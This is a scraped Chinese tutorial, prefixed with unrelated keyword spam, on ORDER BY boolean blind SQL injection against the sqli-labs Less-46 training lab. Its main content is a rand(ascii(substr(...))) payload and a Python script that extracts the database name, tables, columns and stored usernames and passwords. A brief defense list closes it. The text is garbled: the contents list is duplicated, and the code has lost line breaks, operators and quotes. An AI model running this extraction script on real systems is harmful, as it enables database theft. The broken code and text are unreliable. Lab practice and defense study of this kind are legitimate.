动易网络 官方网站,新公司网站建设分录,asi外贸平台,服装设计网页目录
一.order by盲注的原理
二.注入方式
a.布尔盲注
b.时间盲注
三.防御 一.order by盲注的原理
order by子句是用于按指定列排序查询结果#xff0c;列名或列序号皆可。
order by 后面接的字段或者数字不一样#xff0c;那么这个数据表的排序就会不同。
order by 盲…目录
一.order by盲注的原理
二.注入方式
a.布尔盲注
b.时间盲注
三.防御 一.order by盲注的原理
order by子句是用于按指定列排序查询结果列名或列序号皆可。
order by 后面接的字段或者数字不一样那么这个数据表的排序就会不同。
order by 盲注利用的就是这一点。
二.注入方式
环境为sqli-labs的46关参数为sort传入id a.布尔盲注 传入1时 传入2时 传入3时 不同字段的顺序是不同的根据这个结果我们可以用rand实现盲注
?sortrand(ascii(substr((select database()),1,1))114)
转为ASCII码来比较真假为真时第一列为admin3为假时第一列为Dumb 下面是脚本内容
import time
import requests
from bs4 import BeautifulSoupdef inject_database(url): #库dataname for i in range(1, 20):low 32high 128mid (low high) // 2while low high:payload rand(ascii(substr((select database()),%d,1))%d) % (i, mid)res {sort: payload}r requests.get(url, paramsres)html r.textsoup BeautifulSoup(html,html.parser)getusername soup.find_all(td)[1].textif getusername admin3:low mid 1else:high midmid (low high) // 2if mid 32:breakdataname chr(mid)return datanamedef inject_tables(url, database_name):#表tables []for i in range(0, 10): table_name for j in range(1, 20):low 32high 128mid (low high) // 2while low high:payload rand(ascii(substr((select table_name from information_schema.tables where table_schema%s limit %d,1),%d,1)) %d) % (database_name, i, j, mid)res {sort: payload}r requests.get(url, paramsres)html r.textsoup BeautifulSoup(html,html.parser)getusername soup.find_all(td)[1].textif getusername admin3:low mid 1else:high midmid (low high) // 2if mid 32:breaktable_name chr(mid)if table_name:tables.append(table_name)print(fTable {i1}: {table_name})return tablesdef inject_columns(url, database_name, table_name):#列columns []for i in range(0, 10): column_name for j in range(1, 20):low 32high 128mid (low high) // 2while low high:payload rand(ascii(substr((select column_name from information_schema.columns where table_schema%s and table_name%s limit %d,1),%d,1)) %d) % (database_name, table_name, i, j, mid)res {sort: payload}r requests.get(url, paramsres)html r.textsoup BeautifulSoup(html,html.parser)getusername soup.find_all(td)[1].textif getusername admin3:low mid 1else:high midmid (low high) // 2if mid 32:breakcolumn_name chr(mid)if column_name:columns.append(column_name)print(fColumn {i1}: {column_name})return columnsdef inject_data(url, database_name, table_name, column_name):#数据data []for i in range(0, 10): row_data for j in range(1, 20):low 32high 128mid (low high) // 2while low high:payload rand(ascii(substr((select %s from %s.%s limit %d,1),%d,1)) %d) % (column_name, database_name, table_name, i, j, mid)res {sort: payload}r requests.get(url, paramsres)html r.textsoup BeautifulSoup(html,html.parser)getusername soup.find_all(td)[1].textif getusername admin3:low mid 1else:high midmid (low high) // 2if mid 32:breakrow_data chr(mid)if row_data:data.append(row_data)print(fRow {i1}: {row_data})return dataif __name__ __main__:url http://127.0.0.1/sqli/Less-46/database_name inject_database(url)print(fDatabase Name: {database_name})tables inject_tables(url, database_name)print(fTables: {tables})if tables:columns inject_columns(url, database_name, tables[3])print(fColumns: {columns})if columns:username inject_data(url, database_name, tables[3], columns[1])password inject_data(url, database_name, tables[3], columns[2])print(fData: {username})print(fData: {password}) b.时间盲注 时间盲注不依赖页面内容直接通过响应时间判断条件因此无需解析html
三.防御
1.预编译如PHP的PDO
2.最小权限原则限制数据库用户权限仅允许执行必要的操作。
3.输入长度限制
4.部署WAF
